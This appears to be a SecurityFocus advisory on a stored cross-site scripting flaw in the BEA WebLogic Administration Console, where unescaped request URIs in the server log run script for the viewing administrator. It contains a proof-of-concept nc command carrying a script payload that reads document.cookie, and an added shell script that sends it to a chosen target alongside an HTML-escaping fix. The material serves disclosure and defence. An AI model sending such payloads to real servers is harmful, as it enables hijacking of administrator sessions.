BEA WebLogic Administration Console Cross-Site Scripting Vulnerability

An exploit is not required.

The following proof of concept was provided. The request URI is written to the server log verbatim, and the Administration Console renders the log entry without HTML-escaping it, so the injected script executes in the browser of the administrator who views that entry:

1. Send an HTTP request whose request URI carries the XSS payload to the target web server. The request is assembled by hand with printf and nc because a browser or a normal HTTP client would percent-encode the '<' and '>' characters:

$ printf "GET /<script>alert(document.cookie)</script>GomoR HTTP/1.0\r\n\r\n" | nc www.example.com 80

2. Log in to the Administration Console.
3. Go to the menu 'Network configurations/servers/myserver/'.
4. Click on 'View server log'.
5. Search for the string GomoR (the marker appended to the payload) and click on the BEA-id of the matching event; the logged URI is rendered as HTML and the script runs.
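The steps above as a script, added here as an example and not part of the original proof of concept or of any BEA/Oracle code. It builds the raw request so the unencoded payload can be inspected before it goes on the wire, sends it only when a target is supplied (the TARGET and TARGET_PORT variables are assumptions), and shows the escaping step the console omits, applied to a constructed, illustrative log line rather than a real WebLogic log entry.

```shell
#!/bin/sh
# Added example for the log-injection XSS described above (not the advisory's
# own code). Host, port and the sample log line are assumptions.

MARKER="GomoR"   # marker from the PoC, used to find the entry in the log

# Build the raw HTTP/1.0 request exactly as the PoC sends it. A browser or
# curl would percent-encode '<' and '>', which would defeat the injection,
# so the request line is written by hand.
build_request() {
    payload="$1"
    printf 'GET /%s%s HTTP/1.0\r\n\r\n' "$payload" "$MARKER"
}

# Send the request with nc. Only runs when a target host is given.
send_request() {
    host="$1"
    port="${2:-80}"
    build_request '<script>alert(document.cookie)</script>' | nc "$host" "$port"
}

# The step the vulnerable console lacks: HTML-escape a logged URI before it
# is placed in a page. '&' is escaped first so later replacements are not
# double-encoded.
html_escape() {
    sed -e 's/&/\&amp;/g' \
        -e 's/</\&lt;/g' \
        -e 's/>/\&gt;/g' \
        -e 's/"/\&quot;/g'
}

# Constructed sample of what the server log could contain after the PoC
# request. The format is illustrative, not an actual WebLogic log line.
sample_log() {
    printf '%s\n' \
        'GET /index.html HTTP/1.0 200' \
        'GET /<script>alert(document.cookie)</script>GomoR HTTP/1.0 404'
}

# Safe rendering of the entries that match the marker: escape them before
# they reach HTML. Reads log lines on stdin.
render_matches() {
    grep -F -- "$MARKER" | html_escape
}

# Usage: TARGET=www.example.com TARGET_PORT=80 sh xss-log.sh
if [ -n "${TARGET:-}" ]; then
    send_request "$TARGET" "${TARGET_PORT:-80}"
fi
```

Running the script with TARGET set reproduces step 1; the remaining functions show what the log viewer must do with the resulting entry. Any attribute or JavaScript context would need escaping beyond these four characters; the sed rule covers the element-content case the PoC exercises.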

Copyright 2010, SecurityFocus